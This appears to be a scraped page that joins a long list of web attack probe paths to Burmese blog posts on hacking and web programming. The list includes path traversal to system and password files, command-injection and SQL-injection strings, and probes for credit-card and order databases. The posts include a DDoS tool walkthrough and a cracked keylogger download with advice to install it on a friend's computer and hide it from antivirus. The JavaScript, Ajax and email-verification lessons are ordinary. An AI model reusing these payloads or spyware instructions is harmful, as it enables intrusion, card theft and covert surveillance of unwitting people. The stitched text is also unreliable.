/cgi-win/shop.pl/page=;cat%20shop.pl
/eshop/database/log.mdb
/cgibin/awsta
/cgibin/nph-proxy.pl
/cgibin/awstats.pl%3Flang%3Dnl%26update%3D1
//config/datasources/expire.mdb
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Den
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Des
/cgibin/ccbill/password/.htpasswd
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D08
/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeyphrases
/eshop/en/database/credit.mdb
/cgi-bin/pdg_cart/shopper.conf
/password.mdb
/data/verotellog.txt
/cgibin/awstats.pl%3Foutput%3Durldetail%26update%3D1
/productcart/eipc.mdb
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D11
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dit
/index%20of%20/webshop/templates/cc.txt
/cartdb/database/eipc.mdb
/cgi-bin/eshop/database/order.mdb
/cgibin//fpdb/shopping400.mdb
/cgibin/order.txt
/cgi-bin/cart32.exe/expdate%20algunas%20veces
/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeywords
/cgibin/database/comersus.mdb
/cgi-bin/awstats.pl%3Flang%3Des
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dfr
/globill/
/cgibin/fpdb/shopping400.mdb
/cgibin/perl.exe
/eshop/en/database/log.mdb
/cgibin/shopper.exe?search=action&keywords=psiber&template=orders.log
/cg/comersus/database/comersus.mdb
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D07
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Durldetail
/cgibin/admin.mdb
/cgi-bin/whereami.cgi?g=ls
/cgibin/xxxhu
/cgibin/cartserver/admin_files/commerce_user_lib.pl
/cgibin/%20awstats.pl?output=keywords
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dfr
/robot.txt
/cgi-bin/form/mail.cgi
/ibill/mypins/
/cgi-bin/awstats.pl%3Flang%3Dnl
/cgibin/allmanage_admin.pl
/cgibin/%20awstats.pl?cgibin/%20awstats.pl?output=keywords
/cg-ibin/admin_files/
/cgibin/cart/comersus.mdb
/cg-bin/eshop/database/order.mdb
/cgibin/htt
/cgibin/phf
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Den
/database/eipc.mdb
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
/script/shop/shopping350.mdb
/cgibin/shopping350.mdb
/cg-bin/eshop/en/database/credit.mdb
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Den
/cgi-bin/add-passwd.cgi
/logs/200306/charleston.com/
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/cgibin/store/log_files/your_order.log
/cgibin/shopper.exe?search=action&keywords=psiber&template=neworder.log
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/awstats.pl%3Flang%3Dfr%26update%3D1
/cgibin/awstats.pl%3Foutput%3Dkeywords%26update%3D1
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dnl
/cgibin/awstats.pl%3Flang%3Dde%26output%3Durldetail
/cgibin/mailform.pl
/cgibin/awstats.pl%3Flang%3Des%26output%3Dkeywords
/cgi-bin/shop/shopping350.mdb
/cgibin/cart/database/comersus.mdb
/dbase/date.
/www.gambling-01.co.uk/cgibin/password.txt
/cgibin/awstats.pl%3Flang%3Des
/ccbill/ccbill.log
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Dkeywords
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dde
/productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit
/cgibin/index%20of
/cgi-bin/form1.cgi
/cc.txt
/cgibin/awstats.pl%3Flang%3Den%26update%3D1
/cg/./comersus/database/comersus.mdb
/cgi-bin/awstats.pl%3Foutput%3Dkeyphrases
/cgibin/webshop/templates/cc.txt
/....../ all
/....../config.sys
/....../etc/hosts
/../../../../ all
/../../../../../../../boot.ini
/../../../../../winnt/repair/sam._
/../../../../config.sys
/../../../../etc/hosts
/.access
/.bash_history
/.htaccess
/.html/............./config.sys
/.htpasswd
/.passwd
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/AdvWorks/equipment/catalog_type.asp
/Orders/order.log
/PDG_Cart/order.log
/PDG_Cart/shopper.conf
/PSUser/PSCOErrPage.htm
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/WebShop/templates/cc.txt
/_private
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/fpcount.exe
/_vti_inf.html
/_vti_pvt
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/adsamples/config/site.csc
/bin
/carbo.dll
/ccbill/secure/ccbill.log
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm
/cgi
/cgi-bin
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/AnyForm2
/cgi-bin/Cgitest.exe
/cgi-bin/Count.cgi
/cgi-bin/FormHandler.cgi
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/UltraBoard.cgi
/cgi-bin/UltraBoard.pl
/cgi-bin/add_ftp.cgi
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin/ads.setup
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/adp
/cgi-bin/allmanage/k
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanage/userfile.dat
/cgi-bin/allmanageup.pl
/cgi-bin/anyboard.cgi
/cgi-bin/architext_query.pl
/cgi-bin/authorize/dbmfiles/users
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/cart.pl
/cgi-bin/cgiwrap
/cgi-bin/classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/counterfiglet
/cgi-bin/dbmlparser.exe
/cgi-bin/dig.cgi
/cgi-bin/dnewsweb
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/excite
/cgi-bin/faxsurvey
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.pl
/cgi-bin/formmail.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/gH.cgi
/cgi-bin/get32.exe
/cgi-bin/glimpse
/cgi-bin/guestbook.cgi
/cgi-bin/handler
/cgi-bin/htimage.exe
/cgi-bin/htmlscript
/cgi-bin/htsearch
/cgi-bin/htsearch
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin/iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap.exe
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/jj
/cgi-bin/k
/cgi-bin/loadpage.cgi
/cgi-bin/mailform.exe
/cgi-bin/maillist.pl
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/man.sh
/cgi-bin/netstat
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/perl.exe
/cgi-bin/perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin/pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/php.cgi
/cgi-bin/plusmail
/cgi-bin/postcard.pl
/cgi-bin/printenv
/cgi-bin/process_bug.cgi
/cgi-bin/query
/cgi-bin/responder
/cgi-bin/rguest.exe
/cgi-bin/rpm_query
/cgi-bin/rwwwshell.pl
/cgi-bin/search.cgi
/cgi-bin/settings.cfg
/cgi-bin/sojourn
/cgi-bin/survey.cgi
/cgi-bin/test-cgi
/cgi-bin/test.bat
/cgi-bin/textcounter.pl
/cgi-bin/tpgnrock
/cgi-bin/tst.bat
/cgi-bin/tst.bat
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/userfile.dat
/cgi-bin/view-source
/cgi-bin/visadmin.exe
/cgi-bin/w3-msql/
/cgi-bin/webbbs.cgi
/cgi-bin/webdist.cgi
/cgi-bin/webplus
/cgi-bin/websendmail
/cgi-bin/webwho.pl
/cgi-bin/wguest.exe
/cgi-bin/whois_raw.cgi
/cgi-bin/windmail.exe
/cgi-bin/wrap
/cgi-bin/www-sql
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.pl
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-local
/cgi-shl/win-c-sample.exe
/cgi-src
/cgi-src/phf.c
/cgi-win
/cgi-win/uploader.exe
/cgibin
/com1
/com2
/com3
/com4
/con/con
/config/checks.txt
/config/import.txt
/config/mountain.cfg
/config/orders.txt
/default.asp.
/default.asp::$DATA
/doc
/iisadmpwd/aexp2.htr
/iishelp/iis/misc/iirturnh.htw
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/search/advsearch.asp
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iissamples/iissamples/query.asp
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/sdk/asp/docs/codebrws.asp
/log
/logs
/mall_log_files/order.log
/manage/cgi/cgiproc
/msadc/Samples/SELECTOR/showcode.asp
/msadc/msadcs.dll
/msads/Samples/SELECTOR/showcode.asp
/ncl_items.html
/order/order.log
/orders/checks.txt
/orders/import.txt
/orders/mountain.cfg
/orders/order.log
/orders/orders.txt
/ping all
/ping?SomeCrapHere
/piranha/secure/passwd.php3
/pw/storemgr.pw
/quikstore.cfg
/samples/search/queryhit.htm
/scripts
/scripts/CGImail.exe
/scripts/c32web.exe/ChangeAdminPassword
/scripts/cart32.exe/cart32clientlist
/scripts/cmd.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/dbman/db.cgi?db=invalid-db
/scripts/emurl/RECMAN.dll
/scripts/fpcount.exe
/scripts/iisadmin/ism.dll?http/dir
/scripts/issadmin/bdir.htr
/scripts/no-such-file.pl
/scripts/proxy/w3proxy.dll
/scripts/slxweb.dll
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/uploadn.asp
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/wsisa.dll
/search97.vts
/server-status
/showfile.asp
/ssi/envout.bat
/ws_ftp.ini

Friday, November 9, 2012

DDos Concept for Noooobs :)

ဒီ Tutorials ကို ဟက္ကင္းကိုလံုး၀မသိေသးေသာသူမ်ား DDos ရဲ႕အလုပ္လုပ္ပံုကိုသိေစရန္ရည္ရြယ္ရွ္ေရးသားျခင္းျဖစ္သည္
Education အတြက္ရည္ရြယ္ေရးသားျခင္းျဖစ္သည္ ကိုယ္လုပ္သမွ်ကိုကိုယ္သာခံရမည္ ကၽြန္ေတာ္နဲ႔သက္ဆိုင္မွဳမရွိပါ ဟီး
ဒါေၾကာင္႔ Localhost မွာစမ္းျပထားတာ မွတ္ျပီလား

ကဲ႔ DDos တိုက္တယ္ဆိုတာၾကားဖူးပါတယ္ ဘယ္လိုအလုပ္လုပ္လဲဆိုတာကေတာ႔အရင္ကကၽြန္ေတာ္လည္း သိပ္ျပီးမသိပါဘူးအခုလည္း၀ါး၀ါးေလးပါပဲ႔
သိတာကေတာ႔ဗ်ာ Tools ေတြေဒါင္းျပီး ip ေတြရိုက္ထည္႔ခ်တယ္ ျပီးေတာ႔ start ကိုနွိပ္လိုက္တယ္ ဒါပဲ႔ ျပီးျပီလားဆိုေတာ႔ အင္းျပီးျပီးတဲ႔ ဒီအတိုင္းထားလိုက္ဆိုပဲ႔
အမယ္မယ္ ဒီလိုမ်ိဳးက်ေတာ႔လည္းလြယ္သားဟ လို႔စိတ္ထဲ႔ကထင္မိတယ္ဟီး ျပီးေတာ႔ Connection စုတ္ျပတ္သတ္နဲ႔ကိုယ္တိုက္ထားတဲ႔ website ကို reloading လုပ္ျပီး
ၾကည္႔ရတာလည္းအေမာပါပဲ႔ website Down သြားျပီးလားဆိုျပီးေတာ႔ေလ ဒီၾကားထဲ႔ connection မေကာငး္လို႔ Website ကမတက္တာကို ကိုယ္တိုက္လိုက္လို႔က်သြားတယ္လို႔ထင္တယ္
ဟီး မွတ္မိေသးတယ္ တစ္ခါက အဲလိုမ်ိဳးစမ္းတုန္းက ကိုယ္မွာကလိုင္းက်ေနတယ္ ကိုယ္တိုက္တာ မွန္ျပီးဆိုက္ေဒါင္းသြားျပီထင္လို႔ သူငယ္ခ်င္းတစ္ေယာက္ကို ဒီဆိုက္ေဒါင္းသြားျပီးလားလို႔ေမးေတာ႔
ဟီး မင္းဆိုက္ကတက္လာလိုက္တာျမန္လိုက္တာတဲ႔ ဒါနဲ႔နည္းနည္းေတာ႔စိတ္ေလသြားတယ္ သိပ္မၾကာပါဘူးစက္လည္း Hun သြားျပီး Restart ခ်လိုက္ရတယ္
ၾကံဳလို႔ေျပာျပတာပါ ဟီး

DDos တိုက္နည္းမ်ားစြာရွိပါတယ္
အသံုးမ်ားတာကေတာ႔ Tools ေတြသံုးျပီးတိုက္တာမ်ားပါတယ္ အထူးသျဖင္႔ Loic လို႔ေခၚတဲ႔ DDos Tool ကလူသိမ်ားပါတယ္ ဒါက စမ္းသပ္ဆဲကာလမို႔ လူသစ္ေလးေတြသံုးပါတယ္ဟီး
ေနာက္ျပီး script ေတြသံုးျပီးတိုက္ပါတယ္ Php သမားေတြက php နဲ႔ ddos script ေတြေရးၾကတယ္
Perl ဆရာၾကီးေတြက Perl နဲ႔ ddos script ေတြေရးၾကျပီးတိုက္ၾကတယ္ ေနာက္ထပ္အမ်ားၾကီးပါ ကၽြန္ေတာ္သူငယ္ခ်င္းတစ္ေယာက္ကေတာ႔ bot ေတြသံုးျပီးတိုက္တယ္
ဒါက တစ္ေယာက္တည္းသမားေတြသံုးတာပါ bot ကို Control လုပ္နိုင္တယ္ဆိုတာ ေတာ္ရံုအရည္ခ်င္းနဲ႔မရပါဘူး Expericence ကေတာ႔ကၽြန္ေတာ္တို႔ထက္ပိုပါတယ္
အခ်ိဳ႕ကေတာ႔ shell တင္ျပီးသား website ေတြမွာ php bot ေတြကပ္ျပီး ddos တိုက္ၾကတယ္ အဲဒီနည္းကိုသံုးတဲ႔ဆရာတစ္ေယာက္္ကိုေတာ႔ေတြ႔ဖူးတယ္ MHU မွာပါ
နာမည္ေတာ႔ေျပာေတာ႔၀ူး က်န္တာေျပာရင္ကုန္မွာမဟုတ္ေတာ႔ဘူး
ကၽြန္ေတာ္ေရးထားတဲ႔ Tutorial က very basic concept ပါပဲ႔
စရေအာင္
Website တိုင္းမွာသူတို႔ရဲ႕ခံနိုင္ရည္အားဆိုတာရွိတယ္  အဓိကေတာ႔ Server ေပါ႔
အဲဒါကိုသာတိုက္နိုင္ရင္ အဲဒီ website ေဒါင္းပါျပီ
ဥပမာ ကၽြန္ေတာ္က  တိုက္တစ္လံုးကို ကားနဲ႔သြားတိုက္လို႔ရေတာ႔ကားပဲ႔ပိန္သြားမွာေပါ႔
ဒါေပမယ္႔ တဲ႔တစ္လံုးကိုတိုက္ရင္ေကာတဲ႔မျပိဳနိုင္ဘူးလား ????
သူရဲ႕ ခံနိုင္အားအေပၚမူတည္ျပီးတိုက္မွသာ DDos ရဲ႕အစြမ္းကပိုေပၚလြင္မွာပါ ဒါေၾကာင္႔ Social Engineering ကိုေလ႔လာပါလို႔ေျပာပါ အဲဒါ ရည္းစားမ်ားတဲ႔သူေတြ ကၽြမ္းတယ္
ok ဒါေတြကၽြန္ေတာ္စိတ္မ၀င္စားပါဘူး တစ္ကယ္လို႔ တိုက္ကိုကားနဲ႔တိုက္လို႔မျပဳိရင္ ဟီး ေလယာဥ္နဲ႔တိုက္ရင္ေကာ .. ? ေသခ်ာတယ္ျပဳိမွာ ဟီး
အိုစမာဘင္လာဒင္ေတာင္ ေလယာဥ္နဲ႔ အျမြာေမ်ာ္စင္ကို၀င္တိုက္တာ မျပဳိဘူးလား ဟီး ၾကားထဲ႔အမ်ိဳးေတြကိုသတိရေနေသးတယ္  အဲေကာင္လည္းေသျပီ  ေကာင္းတယ္
စာေရးရင္နည္းနည္းေဂါက္သြားလို႔ေလွ်ာက္ေရးထားတာပါ စိတ္ထဲမထားပါနဲ႔

သင္ခန္းစာစမယ္
ပထမဆံုး loaclhost အလုပ္လုပ္ဖို႔ အတြက္ xampp ကို စျပီး Run လိုက္ပါ
ေအာက္ကလိုမ်ိဳး loaclhost run ရင္ server တက္လာလိမ္႔မယ္


ျပီးရင္ RDos Tool ေလးကိုဖြင္႔ျပီးေအာက္မွာျပထားတဲ႔အတိုင္း ip => 127.0.0.1 , port => 80 ဆိုျပီးရိုက္ထည္လိုက္ပါ


1 မိနစ္ေလာက္ၾကာရင္ localhost ကိုျပန္ေခၚၾကည္ပါဦး မတက္ေတာ႔ပါဘူး


Thanks for Readings
Written by cyberoot
www.cyberoot.blogspot.com
I can't attack cos i am offline :)

JavaScript Essential Tranning Part 7

JavaScript Date Object နဲ႔ကခုန္ျခင္း

var today=new Date();        //လက္ရွိအခ်ိန္နဲ႔ေန႔စြဲကိုျပေပးမွာပါ
ဒီလုုိမျပခ်င္ဘူး ရက္ေတြလေတြနွစ္ေတြကိုျပခ်င္တယ္ဆိုရင္ေတာ႔
var y2k = new Date(2000 , 0 ,1);             //ႏွစ္ , လ , ရက္
ဒီထက္ပိုျပီးအေသးစိတ္ျပခ်င္တယ္ေသးတယ္ဟီး
var y2k = new Date(2000 , 0 , 1 , 0 , 0 , 0); //နွစ္ ,  လ , ရက္ , နာရီ , မိနစ္ , စကၠန္႔ ဟီးလြယ္လိုက္တာ
ok ဒါဆို Date Object အေၾကာင္းကိုသိေလာက္ပါျပီ အရင္သင္ခန္းစာေတြမွာလည္းရွင္းျပေပးခဲ႔ဖူးပါတယ္
ဆက္ျပီး date object ရဲ႕ get method အေၾကာင္းကိုဆက္ေလ႔လာၾကည္႔ရေအာင္
var today=new Date();
today.getMonth();          // 0 to 11 အထိျဖစ္မွာပါ ဇန္န၀ါရီလဆို 0 ျဖစ္သြားျပီး ဒီဇင္ဘာလဆို 11 ေပါ႔
today.getFullYear();       // နွစ္ကိုျပေပးမွာပါ သူ႔က zero-base မဟုတ္ဘူးေနာ္
today.getYear();           // ႏွစ္ပဲ႔ျပေပးမွပါ
today.getDate();          // 1 to 31 ျဖစ္မွာပါ လရဲ႕ရက္ေတြကိုဆိုလိုပါတယ္
today.getDay();          // 0 to 6 day အျဖစ္ လရဲ႕ရက္ေတြကိုျပမွာမွာ 0 ဆိုရင္ sunday ေပါ႔
today.getTime();        // 1/1/1970 ကစျပီး လက္ရွိအခ်ိန္ထိ milliseconds နဲ႔ျပေပးမွာပါ


ေနာက္ျပီး setmethod ဆိုတာလည္းရွိပါေသးတယ္

var today=new Date();
today.setMonth(5);
today.setFulllYear(2012);
today.setDay(0);


ဒီလိုမ်ိဳးအမ်ားၾကီးက်န္ပါေသးတယ္ အေသးစိတ္သိခ်င္တယ္ဆိုရင္ေတာ႔ Javascript Reference ကိုသြားဖတ္ၾကည္႔နိုင္ပါတယ္

ေနာက္ျပီးတူသလိုလိုနဲ႔မတူတာေတြကို နွိုင္းယွဥ္ၾကည္႔ရေအာင္

var date1 = new Date(2000,0,1);
var date2 = new Date(2000,0,1);


???? is တူလား ???
ရုတ္တရက္ၾကည္႔ရင္ေတာ႔တူတယ္ထင္ရပါတယ္ ဒါေပမယ္႔ ေအာက္မွာေရးထားတဲ႔ concept ကိုၾကည္႔ပါ
if ( date1 == date2 ) {                 //ဒီလိုဆိုရင္ေတာ႔မွားပါတယ္  မတူပါဘူး ဘာလို႔လဲဆိုေတာ႔ေအာက္မွာဆက္ၾကည္႔

if ( date1.getTime()  == date2.getTime() ) {                  // Yes! တူပီေဟ႔ ဘာေၾကာင္႔တူတာလဲ႔
အေျဖက date1.getTime() က လက္ရွိအခ်ိန္ကို 9890000001 ျပတယ္ဆိုပါစို႔ date2.getTime() ကလည္း  9890000001 ပါပဲ႔ So ,တူတယ္ေလ

Thursday, November 8, 2012

Ardamax Keylogger v3.9.3 with Crack


ေအာက္က link မွာေဒါင္းလိုက္ပါျပီးေတာ႔
http://www.ziddu.com/download/20359425/keylogger.rar.html
File ကို Extract လုပ္ျပီး
ardamax keylogger ဆိုတဲ႔ application ကို Run လိုက္ျပီး install လုပ္လိုက္ပါ

install လုပ္ျပီးသြားရင္ေတာ႔ icon ေလးကိုေတြ႔ပါလိမ္႔မယ္ right click
နွိပ္ျပီး registeration key ကိုေရြးလိုက္ပါ ျပီးေတာ႔ serial.txt  ထဲကအတုိင္းရိုက္ထည္႔လိုက္ပါ
ဒါဆို install လုပ္ျပီးသြားပါျပီ Full version ျဖစ္တြားျပီအခုဆိုရင္ေတာ႔ သင္႔မိတ္ေဆြသူငယ္ခ်င္းစက္ထဲ႔မွာ install လုပ္ျပီး ကလိနိုင္ပါျပီ

ဘယ္လိုလုပ္ျပီး remote install လုပ္ရမလဲဆိုေတာ႔ေနာက္ပိုင္းမွာေဖာ္ျပေပးမွာပါ
ပံုမွန္ဆိုရင္ေတာ႔ keylogger ကို Anti virus software အမ်ားစုကဖ်က္ပစ္ပါတယ္ ဒါေပမယ္႔ ဒါကို bypass လုပ္ရမယ္႔နည္းလမ္း
အမ်ားၾကီးရွိပါတယ္ အေကာင္းဆံုးနည္းကေတာ႔ Crypters သံုးျပီး Bind လုပ္တာပါပဲ႔
Crypter အေၾကာင္းကိုလည္းသိသေလာက္ေတာ႔ေနာက္ပိုင္းမွာေရးေပးပါမယ္
ဒီလိုမလုပ္ခ်င္ဘူးဆိုရင္ေတာ႔ Winspy & Sniperspy ဆိုတဲ႔ ေကာင္ကိုသံုးေစခ်င္ပါတယ္ သူက FuD လုပ္ထားေပးျပီးသားဗ်

Written by Cyberoot
www.cyberoot.blogspot.com

Ajax - XMLHttpRequest Object ဖန္တီးျခင္း


Ajax ရဲ႕အဓိကလုပ္ေဆာင္တာကေတာ႔ XMLHttpRequest object ပဲ႔ျဖစ္ပါတယ္
ဒီေတာ႔ XMLHttpRequest Object ကအေရးၾကီးတာေပါ႔
ေနာက္ပိုင္းထြက္လာတဲ႔ Brower ေတာ္ေတာ္မ်ားမ်ားမွာေတာ႔ XMLHttpRequest Object ကိုေကာင္းေကာင္းအလုပ္လုပ္ပါတယ္
အရင္ version ေတြျဖစ္တဲ႔ IE5 နဲ႔ IE6 မွာေတာ႔ ActiveXObject ပံုစံနဲ႔အသံုးျပဳရမွာပါ

ဘာေၾကာင္႔ XMLHttpRequest Object ကိုသံုးရလဲဆိုရင္ server ေနာက္ကြယ္ကေန data ေတြကိုေျပာင္းလဲေပးဖို႔အတြက္ပါပဲ႔
ဆိုလိုတာက ကၽြန္္ေတာ္တို႔ၾကည္႔ေနတဲ႔ webpage ၾကီးတစ္ခုလံုးကို အျမဲတမ္း Update ျဖစ္ေနေအာင္ေပါ႔ ျပီးေတာ႔ အဲဒီ webpage ၾကီးကိုလည္း
Loading လုပ္ေနစရာမလိုေတာ႔အခ်ိန္ကုန္တာလည္းေတာ္ေတာ္ကိုသက္သာေစပါတယ္ စိတ္ခ်မ္းသာတာေပါ႔
ဥပမာ live Score လိုမ်ိဳး .Live Show လိုမ်ိဳး အမ်ားၾကီးရွိပါတယ္ Server မွာေျပာင္းသြားတာနဲ႔ သက္ဆိုင္တဲ႔ webpage ထဲမွာရွိတဲ႔ data လည္း
တစ္ခ်ိန္တည္းမွာ reloading လုပ္စရာမလိုပဲ႔တစ္ခါတည္းေျပာင္းသြားေတာ႔ေတာ္ေတာ္ကိုအဆင္ေျပမွာပါ
ေနာက္ပိုင္းထြက္လာတဲ႔ browser (IE7+, Firefox, Chrome, Safari, and Opera) ေတြမွာ XMLHttpRequest Object ကတစ္ခါတည္းပါလာပါတယ္
ဥပမာ ကၽြန္ေတာ္က XMLHttpRequest Object တစ္ခုကိုဖန္တီးခ်င္တယ္ဆိုပါစို႔

နမူနာ
xmlhttp = new XMLHttpRequest();
 Internet Explorer (IE5 and IE6) ရဲ႕version အေပာာင္းဆိုရင္ေတာ႔ ActiveX Object ကိုသံုးျပီးေအာက္ကလိုမ်ိဳးေရးနိုင္ပါတယ္
 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
 ဒါေၾကာင္႔ browser ေတြအားလံုးမွာအဆင္ေျပေစဖို႔အတြက္ XMLHttpRequest Object နဲ႔ ActiveXObject နွစ္ခုလံုးကိုထည္႔ေရးေပးရင္ေတာ႔ပိုအဆင္ေျပဆံုးပါပဲ႔

နမူနာတစ္ခုေလာက္ေရးၾကည္႔ရေအာင္
အဲဒါ မေရးခင္ welcome.txt ဖိုင္တစ္ခုအရင္ေရးလိုက္ပါ
<html>
<head>
<script type="text/javascript">
function loadXMLDoc()
{
if (window.XMLHttpRequest)
  {       //ေနာက္ထြက္တဲ႔ browser ေတြအတြက္အဆင္ေျပပါတယ္
  xmlhttp=new XMLHttpRequest();
  }
else
  { // for IE6, IE5 အတြက္ပါ
  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
xmlhttp.onreadystatechange=function()                 //ကဲ႔ အဆင္သင္႔ျဖစ္ရင္ function ကို run ဖို႔အတြက္ေရးထားတာပါ    
  {
  if (xmlhttp.readyState==4 && xmlhttp.status==200)       //request လုပ္လို႔ျပီးသြားျပီး && ok တယ္ဆိုရင္ေတာ႔
    {
    document.getElementById("myDiv").innerHTML=xmlhttp.responseText;     //server ကေနျပန္ေပးတဲ႔ data ေတြကို String အျဖစ္ေျပာင္းဖို႔ responseText
    }
  }
xmlhttp.open("GET","ajax_info.txt",true);    //response အဆင္သင္႔ျဖစ္တဲ႔အခါ function ကိုတစ္ခါတည္း run လို႔ေျပာထားတာပါ
xmlhttp.send();
}
</script>
</head>
<body>

<div id="myDiv"><h2>Please,Change me lol.......</h2></div>
<button type="button" onclick="loadXMLDoc()">Change Text</button>

</body>
</html>



အေသးစိတ္ကိုေတာ႔ေနာက္ထပ္လာမယ္႔သင္ခန္းစာေတြမွာရွင္းျပေပးသြားမွာပါ
Written by cyberoot
www.cyberoot.blogspot.com
Ref:w3schools

Wednesday, November 7, 2012

Email Address ကို Verifying လုပ္ျခင္း

User ကကၽြန္ေတာ္တို႔ website မွာ Sign up လုပ္တဲ႔အခါ ကၽြန္ေတာ္တို႔က user email ကို confirmation code ကိုေပးျပီး verify လုပ္ခိုင္းေစခ်င္တယ္ဆုိရင္ေတာ႔
ဒီနည္းက အသံုး၀င္မယ္ထင္ပါတယ္

ဒီ Tutorial မွာေတာ႔ Php File ေလးခုနဲ႔ Database နွစ္ခုပါပါတယ္
1. signup.php
2. signup_ac.php
3. confirmation.php
4. config.php

ျပီးေတာ႔ Database နွစ္ခုေဆာက္မယ္
1. temp_members_db
2. registered_members

ဘာေတြလုပ္ဖို႔လိုလဲ?
1. User က sign up လုပ္တဲ႔အခါ ေပးဖုိ႔ confirmation code ကို random အေနနဲ႔ထားဖို႔လိုပါတယ္

2. User ရဲ႕ information နဲ႔ confirmation code ကိုသိမ္းဖို႔အတြက္ temp_members_db ဆိုတဲ႔ table ထဲမွာထည္႔ပါမယ္
    ဒါက confirmation code အတြက္ ယာယီသိမ္းဖို႔အတြက္ db table ေဆာက္ထားတာပါ
    ျပီးေတာ႔ email confirmation varify ျဖစ္ျပီးသြားတဲ႔ infomation ေတြကို registered_members ဆိုတဲ႔ table ထဲကိုေျပာင္းေပးဖို႔လိုပါတယ္
   
3. "temp_members_db" ဆိုတဲ႔ table ထဲကို data ထည္႔လို႔ျပီးသြားတဲ႔အခါ sign up လုပ္တဲ႔ user ေတြဆီကို confirmation code ကိုပို႔ေပးရမွာပါ
    တစ္ကယ္လို႔ User ရဲ႕ email လိပ္စာမွားေနတယ္ဆိုရင္ေတာ႔ ပို႔ေပးမွာမဟုတ္ပါဘူး
   
4. User က email ထဲမွာ confirmation link ကိုေတြ႔ျပီး click နွိပ္လိုက္တယ္ဆိုရင္ User ရဲ႕ account ဟာ active ျဖစ္သြားမွာပါ
   အဲလို active ျဖစ္ေအာင္လုပ္လိုက္တဲ႔အခ်ိန္မွာ temp_member_db ဆိုတဲ႔ table ထဲက data ေတြဟာ registered_members ဆိုတဲ႔ table ထဲကိုေျပာင္းလဲသြားမွာျဖစ္ပါတယ္
    ျပီးေတာ႔ temp_members_db ထဲမွာ User နဲ႔သက္ဆိုင္တဲ႔ data ေတြကို delete လုပ္ပစ္မွာေပါ႔ မဟုတ္ရင္ user မ်ားလာတဲ႔အခါ temp table ၾကီးက crash ျဖစ္သြားနိုင္ပါတယ္
    ဒါေၾကာင္႔ ရွင္းေနတာပဲ႔ေကာင္းတယ္
   
